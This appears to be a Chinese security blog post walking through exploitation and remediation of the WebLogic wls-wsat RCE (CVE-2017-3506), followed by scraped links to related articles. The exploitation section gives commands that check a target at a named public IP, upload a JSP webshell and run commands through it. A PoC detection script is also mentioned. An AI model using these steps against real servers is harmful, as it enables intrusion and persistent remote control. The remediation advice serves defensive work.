weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
所有文章,仅供安全研究与学习之用,后果自负!
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
前言
与weblogic 反序列化(CVE-2017-10271)类似
一般情况下weblogic会开放7001以及7002端口
0x01 漏洞描述
wls-wsat组件远程命令执行
如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
0x02 影响范围
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0
0x03 漏洞利用
工具:
cve-2017-3506_webshell.jar
(1)查看使用方法
java -jar cve-2017-3506_webshell.jar
(2)单个url检查
显示漏洞存在
java -jar cve-2017-3506_webshell.jar -u http://118.193.36.37:57661
(3)上传木马
payload
端口后边有个空格
java -jar cve-2017-3506_webshell.jar -s http://118.193.36.37:57661 /wls-wsat/CoordinatorPortType11 shell1.jsp
(4)执行命令
payload:
http://118.193.36.37:57661/wls-wsat/shell1.jsp?password=secfree&command=whoami
cve-2017-3506_poc.py 检测是否存在
python2运行
(1) 运行查看使用方法
(2)检测是否存在漏洞
python2 cve-2017-3506_poc.py http://118.193.36.37:35509/
- 显示存在漏洞
0x04 漏洞修复
1.删除war包
根据实际 环境 路径和业务需求,删除WebLogic程序下列war包及目录
rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
2.设置网络访问控制
配置 http://ip_address:7001/wls-wsat 网络访问控制策略,禁止外网可以直接访问。
3.更新补丁和扫描:
更新Oracle官方发布相关补丁,下载链接: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 。
3.检测和防御
阿里云态势感知已增加检测规则,支持入侵行为和漏洞检测,建议您开通态势感知(专业版以上版本)进行检测。
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)相关推荐
- Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未 ...
- jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞
###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...
- rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警
报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...
- war包启动命令_【漏洞预警】Oracle WebLogic远程命令执行0day漏洞(CVE20192725补丁绕过)...
概述 近日,奇安信天眼与安服团队通过数据监控发现,野外出现Oracle WebLogic远程命令执行漏洞最新利用代码,此攻击利用绕过了厂商今年4月底所发布的最新安全补丁(CVE-2019-2725). ...
- 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选
各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...
- 【知道创宇404实验室】Oracle WebLogic远程命令执行漏洞预警
2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告 http://www.cnvd.org.cn/webinfo/show/4989 称Oracle WebLogic wls ...
- 代码审计-dubbo admin =2.6.1远程命令执行漏洞
前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...
- flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
- CVE-2021-22205 Gitlab exiftool远程命令执行 复现
1 漏洞信息 漏洞名称 Gitlab exiftool远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 7.5 漏洞类型 中间件漏洞 漏洞厂商 GitLab 漏洞 ...
最新文章
- 新书上市 | 人类程序员,你能不能比三体人更懂量子纠缠?
- 自信息跟信息熵的区别
- map area 鼠标跟随
- 完成MSP430的IAP升级程序(总结)
- 基于JAVA+SpringBoot+Mybatis+MYSQL的高校排课系统
- 经典论文阅读记录-持续更新
- extern 与 #define 使用说明
- C++11多线程---future和promise
- 判断字符串中是否存在的几种方案:string.indexof、string.contains、list.contains、list.any几种方式效率对比...
- 学python需要什么基础-学习Python需要哪些基础知识?
- Codeforces Round #666 (Div. 2)B. Power Sequence(等比数列)
- Android中Parcelable接口的实现方法
- 计算机八进制 算法视频,八进制转二进制计算器
- windows10中charles设置代理,android手机无法上网
- 离线数仓DIM层和DWD层,联表后表和字段命名规则
- 在mips64架构的国产系统中安装pyinstaller
- 利用T0定时器定时 100ms,每当定时时间到就使 P1.7 求反
- 利用Xshell修改Linux默认SSH端口号等详细配置
- 7. 内部集成电路总线接口I²C
- IT人生nbsp;需要指引lt;转自:51ctogt;
热门文章
- 谈谈mysql update语句 set顺序问题、列交换sql实现及多表更新注意事项
- ICS-GNN:Lightweight Interactive Community Search via Graph Neural Network
- python极简应用_30 个极简Python代码,拿走即用(真干货)
- 向量代数:向量的内积和外积
- 常用软件性能测试工具
- Spark GraphX-航班飞行网图分析
- 唐发德老师:精益生产管理导师(唐发德)
- java实现微博网站设计_基于jsp的微博网站-JavaEE实现微博网站 - java项目源码
- Vigenere加密算法
- tensorflow2.0——预测泰坦尼克号旅客生存概率(Keras应用实践)